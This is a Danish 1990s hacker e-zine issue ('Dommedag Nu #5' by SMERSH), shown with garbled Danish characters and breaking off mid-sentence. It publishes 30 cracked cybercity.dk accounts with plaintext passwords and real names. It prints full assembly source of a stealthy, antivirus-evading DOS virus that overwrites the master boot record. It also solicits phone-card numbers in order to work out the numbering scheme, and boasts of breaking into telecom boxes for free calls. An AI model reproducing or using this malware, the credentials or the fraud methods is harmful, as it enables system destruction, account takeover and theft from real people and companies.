Sharp og Leroy Historien starter med at, Janek i midten af December, kontakter Darkman p† Darkside Connection og fort‘ller at han har "hacket" cybercity.dk, Darkman fort‘ller ham s† p‘nt at bare fordi man har f†et fat i en /etc/passwd, s† betyder det ikke at man er hacker, Janek giver dog udtryk for han ikke er helt enig og bliver ved med at p†st† at han alts† er en hacker, for han kan nemlig bruge en packet sniffer, men han l‘rer dog hurtigt at der findes visse danskere som er i stand til at kode en packet sniffer [kan alle i SMERSH ikke det? -red] og han fort‘ller at, han ogs† har "hacket" et par BBS'er, [BBS'erne er til hackernes fordel, hvorfor "hacke" dem? -red] her f†r han dog at vide at, det at f† fingerene i en USERS.BBS fra et bbs, absolut intet har med hacking at g›re. Darkman og Clive Sharp (Clive Sharp var p† bes›g) var dog s† flinke og overb‘rende at, hj‘lpe ham lidt p† vej, s† de r†dede ham til at l‘se nogle UNIX, TCP/IP og ANSI C b›ger. Janek uploader s† /etc/passwd fra cybercity.dk til Clive Sharp og beder ham om at f† Cracker Jack, [kun nybegyndere bruger password crackers -red] hvilket han f†r, samtidige sp›rger Janek s† Darkman om krypterings algoritmen som bliver brugt til at kryptere passwords med i UNIX, Darkman pr›ver s† at forklare ham om hvad en envejs algoritme er og andet lav-niveau krypterings teknologi, men dette var Janek ikke helt i stand til at forst†r [det var sikkert Darkman's skyld eh? -red]. Et par dage senere kontakter Janek igen Darkman, for at fort‘lle Darkman, at han har cracket password'et p† 20 accounts, da Janek s† h›rer at Clive Sharp for sjov har siddet og cracket lidt og har f†et 30 accounts, sp›rger han om Clive Sharp har en Alpha/322, for Janek var ikke klar over at man ikke beh›vede at taste password'sne ind, men at man kunne k›rer en wordlist igennem. Darkman fort‘ller ham, at der nok vil bliver skrevet en artikel om ham i det n‘ste nummer af Dommedag Nu, hvorefter Janek tigger om at den ikke bliver skrevet. Janek var dog stadig interesseret i at l‘rer noget mere om hacking og sp›rger derfor Darkman om man ikke kan lave en trojan/bagd›r, men ogs† denne forklaring taber han interessen for, lige s† snart at Darkman er begyndt [/bin/login backdoor ruxor -red]. En m†ned senere bliver Darkman kontaktet af Mr. Nobody, som sp›rger ham om han kender Janek og Cryptic Rider, hvorefter Darkman svarer: "nope", Mr. Nobody uploader s† en fil, som er skrevet af de 2 ovenst†ende [HPA-CULT.ZIP -red]. Filen indholdte telefonnummeret og 20 accounts til cybercity.dk og telefonnummeret og 3 accounts til UNI-C. Grunden til at Mr. Nobody spurgte Darkman og han kendte Janek, var at Janek og Cryptic Rider i filen havde skrevet, at Darkman var en af de mennesker som de beundrede. Vi SMERSH synes at hele denne historie er meget skr‘mmende, fordi hvis fremtidens hackere, bliver mennesker som fort‘ller alle at, de er hackere uden at vide hvad det i virkeligheden drejer sig om og de g›r alt for at blive "ber›mte", [Dixie? han er sku' mere i pressen end min k‘reste skifter trusser -red] s† ser fremtiden for den danske scene meget sort ud. Det v‘rste er dog, ved at udegive den fil offentligt, har de to ›delagt cybercity.dk gateway'en for alle de andre danske hackere. Det synes vi i SMERSH er den v‘rste synd af dem alle og derfor beder vi alle som har Janek og Cryptic Rider, som bruger p† deres BBS, om at smide dem af. Eftersom at Janek og Cryptic Rider allerede har ›delagt cybercity.dk gateway'en, er her de 30 accounts som Clive Sharp fandt, da han for sjov sad og crackede: nicolas:russell:1119:21:Nicolas Bennetzen:/usr/staff/nicolas:/bin/tcsh michael:coitus:1131:21:Michael Nielsen:/usr/staff/michael:/bin/tcsh torben:madsen:1132:21:Torben Madsen:/usr/staff/torben:/bin/tcsh kursus1:kursus1:1901:20::/usr/CyberCity/users/kursus1:/bin/tcsh kursus2:kursus2:1902:20::/usr/CyberCity/users/kursus2:/bin/tcsh kursus3:kursus3:1903:20::/usr/CyberCity/users/kursus3:/bin/tcsh kursus4:kursus4:1904:20::/usr/CyberCity/users/kursus4:/bin/tcsh kursus5:kursus5:1905:20::/usr/CyberCity/users/kursus5:/bin/tcsh kursus6:kursus6:1906:20::/usr/CyberCity/users/kursus6:/bin/tcsh kursus7:kursus7:1907:20::/usr/CyberCity/users/kursus7:/bin/tcsh kursus8:kursus8:1908:20::/usr/CyberCity/users/kursus8:/bin/tcsh kursus9:kursus9:1909:20::/usr/CyberCity/users/kursus9:/bin/tcsh kursus10:kursus10:1910:20::/usr/CyberCity/users/kursus10:/bin/tcsh kursus11:kursus11:1911:20::/usr/CyberCity/users/kursus11:/bin/tcsh kursus12:kursus12:1912:20::/usr/CyberCity/users/kursus12:/bin/tcsh kursus13:kursus13:1913:20::/usr/CyberCity/users/kursus13:/bin/tcsh kursus14:kursus14:1914:20::/usr/CyberCity/users/kursus14:/bin/tcsh kursus15:kursus15:1915:20::/usr/CyberCity/users/kursus15:/bin/tcsh kursus16:kursus16:1916:20::/usr/CyberCity/users/kursus16:/bin/tcsh kursus17:kursus17:1917:20::/usr/CyberCity/users/kursus17:/bin/tcsh kursus18:kursus18:1918:20::/usr/CyberCity/users/kursus18:/bin/tcsh kursus19:kursus19:1919:20::/usr/CyberCity/users/kursus19:/bin/tcsh kursus20:kursus20:1920:20::/usr/CyberCity/users/kursus20:/bin/tcsh kursus21:kursus21:1921:20::/usr/CyberCity/users/kursus21:/bin/tcsh kursus22:kursus22:1922:20::/usr/CyberCity/users/kursus22:/bin/tcsh ccc2422:moon:2422:20::/usr/CyberCity/users/ccc2422:/bin/tcsh ccc2618:mash4077:2618:20::/usr/CyberCity/users/ccc2618:/bin/tcsh ccc2771:abracada:2771:20::/usr/CyberCity/users/ccc2771:/bin/tcsh ccc4404:blackie:4404:20::/usr/CyberCity/users/ccc4404:/bin/tcsh ccc6020:susanne:6020:20::/usr/CyberCity/users/ccc6020:/bin/tcsh SMERSHDOMMEDAGNU#5SMERSH G† V‘k Og Bliv Borte Af Darkman med dokumentation og ide af Clive Sharp Jeg (Clive) sad og l‘ste en artikel i Wired, der omhandlede firmaer der levede af at fremskaffe informationer, der var blevet slettet. Det der blev sagt var, at man blev n›d til at slette en fil 9 gange f›r den var fuldst‘ndigt v‘k. Dette kom som en kraftig overraskelse for mig, da jeg troede, at det var nok at overskrive data tre gange, for at fjerne informationerne ‚n gang for alle. Men det var det ikke! Derfor blev jeg og Darkman enige om, at lave en File-Wiper til alle jer. Ja ja, der er blevet laver file-wipe'ere f›r, men ikke som denne. Denne File-Wiper, som officielt hedder DDNGVOBB, wiper automatisk en fil 10 gange, bare for at v‘re p† den sikre side. Men man skal dog v‘re opm‘rksom p†, at selvom man bruger dette fantastisk utility, s† sikre det ikke alt det, som tid- ligere er blevet slettet p† den normale m†de. Vi vil p† et senere tidspunkt lave en version, der kan wipe de frie sektore p† harddisken. Men hvordan bruger man s† DDNGVOBB? Ja, det er faktisk ganske nemt. For at wipe en fil skriver man: DDNGVOBB filnavn1.ext Hvis man vil wipe flere filer p† ‚n gang, skal man skrive: DDNGVOBB filnavn1.ext filnavn2.ext filnavn3.ext .... Man kan desv‘rre IKKE bruge wildcards, men dette vil blive tilf›jet i den n‘ste version. VIGTIGT! Man m† IKKE bruge disk-cache (WRITE), n†r man bruger DDNGVOBB, da dette medf›re en kraftig sikkerhedsrisiko. For at se, om du har din WRITE- cache sl†et til, s† skriv (hvis du bruger smartdrv): smartdrv og du vil f† de informationer du skal bruge. ---------- Klip her ---------- comment * DDNGVOBB Code by Darkman/SMERSH To compile DDNGVOBB with Turbo Assembler v 4.0 type: TASM DDNGVOBB.ASM TLINK /t DDNGVOBB.OBJ * .model tiny .code org 100h ; Origin of DDNGVOBB code: cld ; Clear direction flag mov ah,09h ; Standard output string lea dx,message ; DX = offset of message int 21h ; Do it! mov si,81h ; SI = offset of command tail push si ; Save SI at stack conv_param: mov di,si lodsb ; Load a byte of command tail cmp al,0dh ; End of command tail? je move_enter ; Equal? Jump to move_enter cmp al,20h ; End of filename? jne conv_param ; Not equal? Jump to conv_param xor al,al ; Zero AL stosb ; Zero a byte of command tail jmp conv_param move_enter: mov ax,0d00h stosw ; Move the end of the command tail pop si ; Load SI from stack find_param: lodsw ; Load a word of command tail dec si ; Decrease SI or ah,ah ; Beginning of filename je find_param ; Equal? Jump to find_param cmp ah,0dh ; End of command tail je exit ; Equal? Jump to exit or al,al ; Beginning of filename jne find_param ; Not Equal? Jump to find_param mov ax,4301h ; Set file attributes xor cx,cx ; Zero CX mov dx,si ; DX = offset of filename int 21h ; Do it! jc get_message ; Error? Jump to get_message mov cl,0ah ; Overwrite file 10 times next_pass: push cx ; Save CX at stack mov ax,3d01h ; Open file (write) mov dx,si ; DX = offset of filename int 21h ; Do it! jc get_message ; Error? Jump to get_message xchg ax,bx ; Exchange AX with BX keep_wiping: mov ax,4201h ; Move file pointer current position cwd ; Zero DX mov cx,dx ; Zero CX int 21h ; Do it! push dx ax ; Save registers at stack mov ax,4202h ; Move file pointer to end of file cwd ; Zero DX int 21h ; Do it! mov bp,dx mov di,ax mov ax,4200h ; Move file pointer from beginning pop dx cx ; Load registers from stack int 21h ; Do it! sub di,ax ; Calculate what's left to be wiped sbb bp,dx ; " " " " " " mov cx,0ffffh ; Write 64 Kb or bp,bp ; Don't write 64 Kb? jnz write_file ; Not zero? Jump to write_file mov cx,di write_file: mov ah,40h ; Write file cwd ; Zero DX int 21h ; Do it! or bp,bp ; Pass finished? jnz keep_wiping ; Not zero? Jump to keep_wiping mov ah,3eh ; Close file int 21h ; Do it! pop cx ; Load CX from stack loop next_pass mov ah,41h ; Delete file mov dx,si ; DX = offset of filename int 21h ; Do it! lea dx,successful ; DX = offset of successful jmp stdout_str get_message: cmp ax,02h ; File not found? lea dx,filenotfound ; DX = offset of filenotfound je stdout_str ; Equal? Jump to stdout_str cmp ax,03h ; Path not found? lea dx,pathnotfound ; DX = offset of pathnotfound je stdout_str ; Equal? Jump to stdout_str cmp ax,05h ; Access denied? lea dx,accessdenied ; DX = offset of accessdenied stdout_str: mov ah,09h ; Standard output string int 21h ; Do it! jmp find_param exit: cmp dx,offset message ; DX = offset of message? jne restore_dta ; Not equal? Jump to restore_dta mov ah,09h ; Standard output string lea dx,param_error ; DX = offset of param_error int 21h ; Do it! restore_dta: int 20h ; Exit to DOS! message db 'DDNGVOBB v 1.00 By Darkman/SMERSH',0dh,0ah db '=== <<< Dommedag Nu-File Wipe >>> =============================== 23-11-95 ===',0dh,0ah db 'Usage: DDNGVOBB [files]',0dh,0ah db '------------------------------------------------------------------------------',0dh,0ah,0dh,0ah,'$' param_error db 'No parameters...',0dh,0ah,'$' filenotfound db 'File not found...',0dh,0ah,'$' pathnotfound db 'Path not found...',0dh,0ah,'$' accessdenied db 'Access denied...',0dh,0ah,'$' successful db 'File successfully wiped...',0dh,0ah,'$' end code ---------- Klip her ---------- SMERSHDOMMEDAGNU#5SMERSH Danmark Direkte Telekort Af Clive Sharp Her for nyligt faldt jeg over et Tele Danmark kort, som jeg ikke har set f›r. Kortet hedder Danmark Direkte Telekort, og kan bruges til at ringe FRA udlandet TIL Danmark. Du kan IKKE ringe fra Danmark til udlandet, og du kan ikke ringe til andre lande end til Danmark (fra udlandet). Forsiden af kortet. Forsiden af Danmark Direkte kortet (som er i den normale kreditkort st›rrelse), ligner ikke et normalt Tele Danmark Telekort. P† det eksemplar som jeg har, er der et billede af en mand, der sidder i badebukser p† nogle klipper ved vandet. Forneden st†r der med hvidt: TELEKORT. Til h›jre er der et Tele Danmark logo, som st†r p† h›jkant. Ovenover det st†r der: 80 Kroner. Ovenover det st†r der Danmark Direkte, og der er et stort D, der er fyldt ud med et Dansk flag. Bagsiden af kortet (direkte afskrift f›lger). [ Danmark Direkte Telekort Med Danmark Direkte Telekort kan du ringe hjem til Danmark alle d›g- nets 24 timer fra alle slags telefoner. F›lg vedlagte vejledning! Bem‘rk, at ved korttelefoner o.l. skal kor- tet IKKE indstikkes i automaten eller f›res gennem kortl‘ser. Yderligere information om brug af Danmarks Direkte Telekort kan f†s hos TelefonService Udland, servicenummer 141. Tele Danmark Udl›bsdato: 21.02.96 Litra: AB L›benr: 57862447 KORTNUMMER: 995 845 0598 Restv‘rdi refunderes efter udl›bsdato i indtil 6 m†neder. ] Bem‘rk, at der IKKE er nogen magnetstribe p† kortet, ligesom der heller ikke er nogen chip (Danm›nt stil). Det eneste man skal bruge er det kortnummer, som der st†r p† kortet. Og der er INGEN hemmelige pin-koder. Grunden til dette kraftige frav‘r af sikkerhed er nok, at Tele Danmark ikke er s† bange for fusk, da man ikke kan ringe fra Danmark, men kun til Danmark. Sammen med kortet f†r man en l‘kker lille vejledning. Og som f›r s† kommer der her en direkte afskrift (af noget af den): [ 1) V‘lg Danmark Direkte-nummeret for det land, hvori du befinder dig. Se nedest†ende liste. Afvent forbindelse med det automatiske sys- tem. 2) Tast eller indtal "1" for valg af "automatisk kortsamtale". 3) Tast/indtal kortnummer (starter med 99). 4) Tast/indtal det Danske telefonnummer. F›r du f†r forbindelse med nummeret, f†r du oplysning om, hvor lang samtaletid, du har til- bage p† kortet. BEM’RK! Efter indtaling af et ciffer indikerer eet "bip", at infor- mationen er opfattet - to "bip" betyder, at cifferet skal gentages. Alaska 1800 762 0045 (20,00) Australien 1800 881 450 (13,00) Bahrain 80 0045 (20,00) Belgien 0800 1 0045 (4,00) Brasilien 0008 045 (20,00) Canada 1800 363 4045 *6* Chile *3* *4* 000 345 (20,00) Costa Rica 175 (20,00) Cypern 0809 0045 (6,00) Filippinerne *3* 105 45 (20,00) Finland 9800 1 0450 (3,00 *2*) Frankrig: - privattelefon 19 *1* 0045 (4,00) - m›nttelefon 19 *1* 0045 (4,00 *5*) - korttelefon 19 0045 (4,00) New Zealand 000 945 (20,00 *5*) Norge 8001 9945 (3,00) Polen *3* 0045 01010 (4,00 *5*) Portugal 0505 0045 (4,50) Puerto Rico 1800 762 0045 (20,00) Schweiz 155 1145 (4,75) Singapore 8000 45 0450 (16,00) Slovakiet *3* 0042 0045 01 (4,00) Spanien 900 99 0045 (6,00) Storbritannien: - BT-telefoner 0800 89 0045 (4,00 *5*) - MCI-telefoner 0500 89 0045 (4,00) Sverige 020 799 045 (3,00 *5*) Gr‘kenland *3* 008 0045 11 (4,50 *5*) Holland 06 *1* 022 0045 (4,00) Hong Kong 800 0045 (16,00 *5*) Indonesien *3* 001 801 45 (20,00) Irland 1800 55 0045 (4,00) Island 999 045 (6,00 *2*) Israel 177 450 2727 (13,00 *5*) Italien *3* 172 0045 (4,50 *5*) Japan 0039 451 (16,00) Jomfru›erne (AM) 1800 762 0045 (20,00) Litauen 8 *1* 198 (6,00) Luxembourg 0800 0045 (4,00) Malaysia *3* 800 0045 (20,00 *5*) Marokko *3* 002 11 0045 (8,00) Sydafrika *3* 0800 99 0045 (20,00 *5*) Sydkorea 009 0450 (20,00) Taiwan 0800 45 0045 (20,00) Thailand *4* 001 999 45 1000 (20,00) Tjekkiet *3* 0042 0045 01 (4,00) Tyrkiet *3* 008 *1* 0045 1177 (6,00) Tyskland *3* 0130 80 0045 (4,50 *5*) Ungarn 00 *1* 800 04511 (4,00) USA: - AT&T-telefoner 1800 762 0045 *6* - MCI-telefoner 1800 888 3263 *6* - Sprint-telefoner 1800 659 0098 *6* strig 022 903 045 (4,00 *2*) *1* Afvent eventuelt ny klartone f›r ›vrige cifre v‘lges. *2* Under samtalen betales ogs† lokaltakst p† stedet. *3* Opkald ikke muligt fra hele landet. *4* Opkald ikke muligt fra m›nttelefoner. *5* Fra m›nt/korttelefoner betales startafgift (retuneres nogle steder efter samtalen). *6* Canada/USA - minutafgift: Mandag-fredag kl. 8-23 Dansk tid 10,00 dkr. vrige tidspunkter 8,00 dkr. Systemet som dette k›re p†, er et voice response system, i stil med AT&T. Det vil sige, at du b†de kan taste og "tale" dig igennem, UDEN at skulle snakke med en operat›r. Hvad kan jeg bruge det til, sp›rger du sikkert. Tjaaa, du kunne jo give det til nogle af dine udenlandske venner, s† de kan ringe gratis til dig. Det er ogs† godt, hvis du vil have access til et udenlandsk H/P/A/V/C bbs, og hvis du ikke har de h†rde k0d3Z, s† kan det godt blive sv‘rt. Men hvis du s† l‘gger nogle af disse Danmark Direkte kort, s† f†r du temmeligt sikkert access. Nu mangler vi bare at finde en m†de at udregne disse kort p†, da det er n‘sten 100% sikkert, at man kan udregne dem. Til det skal vi bare bruge en masse kort. Desv‘rre er det ikke lige de kort, som man finder flest af p† gaden s† hvis i finder nogle af disse kort, s† smid lige nummeret op p† Darkside Con- nection, og s† skal vi nok arbejde p† at f† det fikset! [Der er bonus DL til dem der upper kortnumre -red]. Bem‘rk at kortnummeret er ‘ndret. SMERSHDOMMEDAGNU#5SMERSH Yitzhak-Rabin - en virus Af TorNado med forord af Clive Sharp Ja, og igen har vi en virus fra vores ven TorNado. TorNado har v‘ret s† flink selv at beskrive sin virus, s† det slipper vi for at g›re. Det kan siges at den har rimelig mange interessante funktioner, dog kunne den godt optimeres mere, men det er han klar over. ;*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#* ; ; Yitzhak-Rabin ; by ; T o r N a d o ; ; Description: ; ------------ ; -- Parasitic resident .COM infector ; -- Semi stealth ( 11h/12h and 4eh/4fh ) ; -- Int24 ( Critical Error Handler ) ; -- Intercept Int9 ( Ctrl-Alt-Del -> writes logo into sector ) ; -- Intercept Int26 DOS absolut disk write ( MBR wiped the 3rd! ) ; -- XOR encryption ; -- Delete Tbav CRC checksums ( in current DIR ) ; -- Saves original Time / Date ; -- Infect COMMAND.COM ; ; Antivirus: ; ---------- ; -- No FLAGS on hard heuristic with TBAV650 ; -- No detection with heuristic by F-PROT v. 2.21 ; -- No detections at all by AVP v. 2.1 ; -- No detection at all by Mcafee v. 2.2.0 ; -- No detection at all by Toolkit v. 7.0 ; ; To Compile: ; ----------- ; Tasm rabin.asm ; Tlink rabin.obj ; Exe2bin rabin.exe rabin.com ; ;*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#**#*#*#*#*#*#*#*#*#*#*#*#*#*#**#*#*#*#*#**#*#*#* yitzhak_rabin segment assume cs:yitzhak_rabin,ds:yitzhak_rabin,es:yitzhak_rabin org 00h start: call fooldeltaoff deltaOFF: int 03h call xor_crypt jmp short installation encrypt_start: jmp_error: jmp error_resident installation: mov ax,8863h ; rabin service int 21h cmp bx,'YR' ; DX returned in bx? je jmp_error ; YR = assume resident cut_memory: mov ah,4ah ; find top of memory mov bx,0ffffh ; (65536) int 21h sub bx,(codeend-start+15)/16+1 ; resize enough para's mov ah,4ah ; for virus int 21h mov ah,48h ; allocate for virus mov bx,(codeend-start+15)/16 int 21h jc jmp_error dec ax ; ax - 1 = mcb mov es,ax mov byte ptr es:[0],'Z' mov word ptr es:[1],8 ; dos = mcb owner inc ax cld lea si,[bp+offset start] ; vir start mov es,ax xor di,di mov cx,(codeend-start+4)/2 ; vir length rep movsw ; get DOS time and decide if we are gonna hook int9 or int26 mov ah,2ch ; get DOS time int 21h cmp cl,10 ; is min below or = 10 jbe hook_int09h ; if so hook int9 cmp cl,55 ; is min greather or = 55 jge hook_int26h ; if so hook int26 hook_int26h: xor ax,ax mov ds,ax push ds lds ax,ds:[26h*4] mov word ptr es:[oldint26h],ax mov word ptr es:[oldint26h+2],ds pop ds mov word ptr ds:[26h*4],offset virusint26 mov bx,es mov ds:[26h*4+2],bx jmp short hook_int21h hook_int09h: xor ax,ax mov ds,ax push ds lds ax,ds:[9h*4] mov word ptr es:[oldint09h],ax mov word ptr es:[oldint09h+2],ds pop ds mov word ptr ds:[9h*4],offset virusint9 mov bx,es mov ds:[9h*4+2],bx hook_int21h: xor ax,ax mov ds,ax push ds lds ax,ds:[21h*4] mov word ptr es:[oldint21h],ax mov word ptr es:[oldint21h+2],ds pop ds mov word ptr ds:[21h*4],offset virusint21 mov bx,es mov ds:[21h*4+2],bx push cs pop ds error_resident: push cs pop es mov di,100h mov cx,4 lea si,[bp+offset orgbuf] ; fix correct offset (delta) repne movsb mov ax,101h dec ax ; entry point jmp ax virusint21 proc near cmp ax,4b00h ; Execute je jmpinfect cmp ax,4301h ; Set attributes je jmpinfect cmp ah,11h ; FCB findfirst je FCB_stealth cmp ah,12h ; FCB findnext je FCB_stealth cmp ah,4eh ; DTA findfirst je DTA_stealth cmp ah,4fh ; DTA findnext je DTA_stealth cmp ax,8863h ; Check if resident jne function21 mov bx,'YR' iret virusint21 endp function21 proc near jmp dword ptr cs:[oldint21h] ret function21 endp jmpinfect: jmp infect FCB_stealth: pushf push cs call function21 or al,al ;was the dir call sucessfull?? jnz skip_dir ;if not skip it push ax bx es mov ah,51h ; get current PSP to es:bx int 21h mov es,bx cmp bx,es:[16h] ;is the PSP ok?? jnz error_1 mov bx,dx mov al,[bx] ;al holds current drive push ax ;extended FCB mov ah,2fh ;get DTA-area int 21h pop ax inc al jnz no_ext add bx,7 no_ext: mov al,byte ptr es:[bx+17h] ;get seconds field and al,1fh xor al,01h ;is the file infected?? jnz error_1 ;if not don't hide size hide_it: sub word ptr es:[bx+1dh],(codeend-start) ;else sub vir_size error_1: pop es bx ax skip_dir: retf 2 DTA_stealth: pushf push cs call function21 jc no_files pushf push ax di es bx mov ah,2fh int 21h mov di,bx add di,1eh cld mov cx,9 ; scan for the '.' mov al,'.' repne scasb jne not_inf ; file without any ext. cmp word ptr es:[di],'OC' jne not_inf cmp byte ptr es:[di+2],'M' jne not_inf mov ax,es:[bx+16h] and al,1fh xor al,01h jnz not_inf cmp word ptr es:[bx+1ah],(codeend-start) ;dont stealth too ja hide ;small files hide: sub es:[bx+1ah],(codeend-start) ; hide file size not_inf: pop bx es di ax popf no_files: retf 2 virusint24 proc near mov al,03h iret virusint24 endp jmpexit_virus: jmp exit_virus infect: push ax bx bp cx dx di si ds es open_file: push ds push dx mov ax,3524h int 21h mov word ptr cs:[save_int24],bx mov word ptr cs:[save_int24+2],es push cs pop ds mov dx,offset virusint24 mov ax,2524h int 21h pop dx pop ds mov ax,3d02h ; open file with read/write axs int 21h push ax jc jmpexit_virus ; if error jump out pop ax xchg ax,bx mov ax,5700h int 21h mov cs:[save_time],cx mov cs:[save_date],dx push ds push cs pop ds push cs pop es mov ah,3fh ; read first four bytes mov dx,offset orgbuf ; to orgbuf mov cx,4 int 21h cmp byte ptr cs:[orgbuf],'M' ; check 1 byte je close_file cmp byte ptr cs:[orgbuf+3],'R' ; already infected? je jmpexit_virus call delete_crc move_pointer: mov ax,4202h call file_pointer mov bp,ax sub ax,3 mov word ptr cs:[newbuf+1],ax mov ah,2ch ;get random number from int 21h ;time mov word ptr ds:[encrypt_val],dx ;store it mov ax,08d00h mov es,ax mov di,00h mov si,di mov cx,(codeend-start+1)/2 rep movsw push es pop ds xor bp,bp call xor_crypt ;and encrypt mov ah,40h ;write it to file mov cx,codeend-start mov dx,offset start int 21h mov ax,4200h call file_pointer mov ah,40h ; write new jump mov cx,4 mov dx,offset newbuf int 21h close_file: stealth_marker: mov ax,5701h mov dx,cs:[save_date] mov cx,cs:[save_time] and cl,0e0h ; stealth marker inc cl int 21h mov ah,3eh ; close file int 21h push ds pop ds mov ds,cs:[save_int24+2] mov dx,cs:[save_int24] mov ax,2524h int 21h ; restore the int 24h exit_virus: pop ds es ds si di dx cx bp bx ax jmp function21 file_pointer: cwd xor cx,cx int 21h ret ;***************************** INT 9h **************************************** virusint9 proc near ; If key pressed this push ax ; routine is called in al,60h ; has an ctrl-alt-del cmp al,ctrl_alt_del ; been made? je warm_reboot function9: pop ax jmp dword ptr cs:[oldint09h] ; leave system alone iret warm_reboot: mov ah,19h ; get current drive int 21h cwd mov cx,1 ; write 1 sector lea bx,logo ; what to write ! int 26h db 0eah,0f0h,0ffh,0ffh,0ffh ;Reboot! virusint9 endp ;***************************** INT 26h *************************************** virusint26 proc near mov ah,2ah ; get DOS date! int 21h cmp dl,3h ; 3rd any month Rabins deathday! je kill_mbr jne function26 kill_mbr: mov ax,0301h sub bx,bx mov cx,0001h mov dx,0080h int 13h ; write the partition table function26: jmp dword ptr cs:[oldint26h] iret virusint26 endp ;************************** Delete Anti-vir.dat ****************************** delete_crc proc near mov ax,4301h ; Clear attributes xor cx,cx int 21h mov ah,41h lea dx,tbav_crc int 21h ret delete_crc endp tbav_crc db 'anti-vir.dat',00h encrypt_end: save_time dw 0 save_date dw 0 save_int24 dw 2 dup (?) logo db "[ Yitzhak-Rabin 1.00 (c) made by TorNado in Denmark '96 ]" oldint09h dd ? oldint21h dd ? oldint26h dd ? encrypt_val dw 0 ctrl_alt_del equ 53h orgbuf db 0cdh,20h,00,00 ; place to save first 4 bytes newbuf db 0e9h,00,00,'R' ; work on new Entry Point xor_crypt: mov dx,word ptr ds:[bp+encrypt_val] lea si,[bp+encrypt_start] mov cx,(encrypt_end-encrypt_start)/2 xor_loop: xor word ptr ds:[si],dx ;simple ordinary xor-loop inc si ;encryption inc si loop xor_loop ret fooldeltaoff: call $+3 pop bp sub bp,offset $ - 1 jmp $+2 ret codeend: yitzhak_rabin ends end start SMERSHDOMMEDAGNU#5SMERSH The Party 95 - hvad gik der galt? Af Clive Sharp Vi i SMERSH havde i lang tid g†et og snakket om The Party '95, og om hvor fedt det skulle blive. Og det startede da ogs† meget godt. Alt blev arr- angeret i bund, og Darkman fortalte alle der loggede p† Darkside Connection, at de SKULLE komme til The Party '95, da det ville blive totalt vildt. Det blev det bare ikke! Det startede den 27/12 kl. 10.00 p† sterport station hvor jeg (Clive Sharp) og Darkman m›dtes og blev samlet op af Narkobagmanden i hans BMW (SMERSH-mobilen), og derefter k›rte vi ud til Doggman hvor KTAS-teltet ogs† blev samlet op. Derefter var det afsted til f‘rgen. F‘rgeoverfarten var en oplevelse for livet. Folk er IKKE vant til at se 4 hardcore hackere i en BMW, og da Doggman stod ude p† bild‘kket og testede ledninger, fik han de onde ›jne fra de andre p† d‘kket (sikkert jyder). Vi stoppede i Odense hvor vi indtog vores normale frokostmad (McD og cola) hvorefter vi fortsatte mod Gylland. Da vi ankom til "party stedet" s† det rimeligt sejt ud. Massere af mennesker og gang i den. Vi gik inderfor og fandt Leroy, Bobby Ewing, *Krigeren og 99papa (Deja-vu og Saron var ikke til "part- yet" [heldige svin -red]). Vi satte vores compere op og kiggede lidt omkring. Vi fandt ikke andet end W/\r3z KiDS og folk fra "Randers computerklub" eller hvor det nu var de kom fra. De var ihvertfald en bunke tabere. N†, s† pr›vede vi at komme p† netv‘rket. Men nej, det virkede ikke og deres "teknikker" var ikke til stede. Godt arrangeret drenge! Og s† skete det. Ganske uprovokeret gik en eller anden tumpe op p† scenen og begyndte at synge. F›rst troede vi det var en fejl, men vi fandt senere ud af, at det var en der fik PENGE for at komme og synge. Fat det! Jeg har ALDRIG h›rt noget lyde Sڈ d†rligt i hele mit liv! Endnu en genistreg fra folkene bag TP '95. Mens vi s† sad og fik giga klodser af TP '95 begyndte deres "rave". Jeg ved ikke hvad det var, men det var IKKE et rave. M†ske en d†rlig kopi. Da blev vi enige om, at vi ville phreake fra TP '95, bare for at genere arrang›rerne. Og det gjorde vi s†. Vi startede med at ringe fra sovesalen (midt under deres "rave"), og vi fik snakket med nogle af vore venner i det store udland. Ganske bekvemt vil jeg nu sige. Men hen ad morgen fik vi nye ide‚r. Nu skulle der ringes i bund. S† vi stormede udenfor og †bnede en af de JTAS bokse der sad p† v‘ggen (ja, vi har en "trekants"-n›gle) og s† ringede vi videre. Derefter gik det ud over de omkring- liggende bygninger, som ogs† vil f† en st›rre tlf-regning n‘ste gang. Vi endte ved en af de st›rre fordelerbokse (ja, de er sgu' forskellige fra dem p† Sj‘l- land), som med et diskret spark blev †bnet (vi havde ikke vores dirkes‘t med). Under denne "udflugt" tog vi massere af billeder, som vi gerne skulle v‘re ud- givet sammen med dette nummer af Dommedag Nu. Ca. kl. 0700 havde vi f†et nok af TP '95, og k›rte hjemad. Vi var til- bage p† sterport station kl. 1100 den 28/12. Men hvad var der galt med TP '95? Tjaaa, det var i mine ›jne ikke et "party" p† samme m†de som de "gamle" party's. Jeg har v‘ret til en del forskellige party's (Dominators-Upfront-Tri- logy '89 [Randers], Kefrens-Dexion '90 [Falster], Silents-Red Sector '90 [Glostrup], Dexion '90 [Odense], The Party '91 [ڈrs], The Party '92 [ڈrs] og Chaos Computer Club '94 [Berlin]) og i forhold til dem er TP '95 ikke et party. P† de ovenst†ende party's skulle man i de fleste tilf‘lde v‘re inviteret for at kunne komme ind. P† den m†de slipper man for folk som Horsens Computer Klub og lignende. Der var altid massere af h†rde folk, mens der p† TP '95 ikke engang var nogle af de h†rde warez folk, og hvor er man s† henne? F›r i tiden blev der altid vist massere af nye pirat-film og pornofilm. Jeg s† 1 (en) porno-film p† TP '95! Er det ringe eller hvad? Grunden til at TP '95 var s† ringe er nok bare, at arrang›rende var mere interesserede i at score nogle penge, end de var i at afholde et godt party. Trist men sandt. Lad os h†be at n‘ste party bliver et "invite only", s† slipper vi for den h‘r af lamers. SMERSHDOMMEDAGNU#5SMERSH B O G H J R N E T Hackers David Bischoff, Harper Paperbacks, ISBN 0-06-106375-4 L‘st og anmeldt af Clive Sharp Jeg var i Chicago's lufthavn, hvor jeg skulle vente i et par timer, da jeg s† bogen. "Hackers" stod der i bl†t, og foroven stod der, at det nu var en "major motion picture". Fedt nok t‘nkte jeg, for Deja-vu havde fortalt mig om et interview, som han havde set p† CNN, som omhandlede en hacker-film, s† det m†tte v‘re denne [eller The Net -red]. Jeg k›bte den, og gik straks igang med at l‘se. At sige, at jeg blev skuffet, ville v‘re en mild underdrivelse. P† side fem f†r vi at vide, at helten, som hedder noget s† originalt som "Zero Cool", har lavet en virus, der fik 1507 computere p† Wall Street til at g† ned. N† ja, han er forresten 11 †r gammel. Herfra gik det ned af bakke. Jeg ved ikke med jer, men jeg kender IKKE s‘rligt mange b›rn p† 11 †r, der er i stand 